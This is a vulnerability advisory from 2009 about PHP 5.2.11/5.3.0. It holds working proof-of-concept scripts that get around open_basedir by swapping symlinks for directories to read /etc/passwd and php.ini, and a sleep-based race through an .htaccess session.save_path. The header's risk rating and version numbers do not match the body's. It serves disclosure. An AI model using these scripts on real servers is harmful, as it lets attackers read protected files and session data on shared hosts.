PHP 5.2.12/5.3.1 Multiple Vulnerabilities

Published
Credit
Risk
2009.11.13
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
N/A
N/A
Yes
Yes

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009

Risk: Medium

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

ksymlink ? Creates a symbolic link

bool symlink ( string $target , string $link )

- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exist in security model based on symlinks open_basedir. Paths like $target and $link are checked by open_basedir. We can bypass open_basedir, but function symlink() is not affected. Issue has been generated by false security model designed by PHP.

example:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd realy exists.
So if we want read other file, we need create other structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist. Very important is removing fake link "tmplink" and we need to create in this same place dir with this same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here. Because, "tmplink" (dir) are only -1 deep, not -4.

Under PHP 5.2.11 we can also bypass safe_mode. However, the security, such as whether to run suphp php with the privileges of users also have their drawbacks.

We can use our exploit to show this vulnerability. If httpd allow read link (default), we can create symlink to / (ofcourse if we have access). If we can not read symlink, we can use next PHP flaw "hazard syphon" to read other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

file /www/test/notyetexists doesn`t exist (current)

script1 "/www/test/sessrun.php"
<?php
sleep(60);
session_start();
?>

now we have 60 sec to run script2

script2 "/www/test/runin60.php":

<?php
mkdir("abc");
chdir("abc");
mkdir("tmp");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../tmp", "notyetexists");
unlink("tmplink");
mkdir("tmplink");
?>

Hazard exist in PHP!

Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where first phase (SAPI) will check privileges to /www/test/notyetexists. But this file or dir, doesn't exists, so open_basedir will return false.
2. Script1 will generate sleep signal with 60sec delay. In this momemnt, we need run Scritp2. This script, will create link /www/test/notyetexists to /tmp or other directories.
3. Script1 after 60sec will run session_start() function, where privileges to /www/test/notyetexists aren't checked in this moment.

In result, we can use function sleep() to create fake delay and first issue can help create symlinks.

- --- 2. Exploit ---

open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard analogy, as in this note

- --- 3. Fix ---
Fix not avaliable

- --- 4. Contact ---
Author: Maksymilian Arciemowicz

References:

http://lu2.php.net/manual/en/function.symlink.php


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com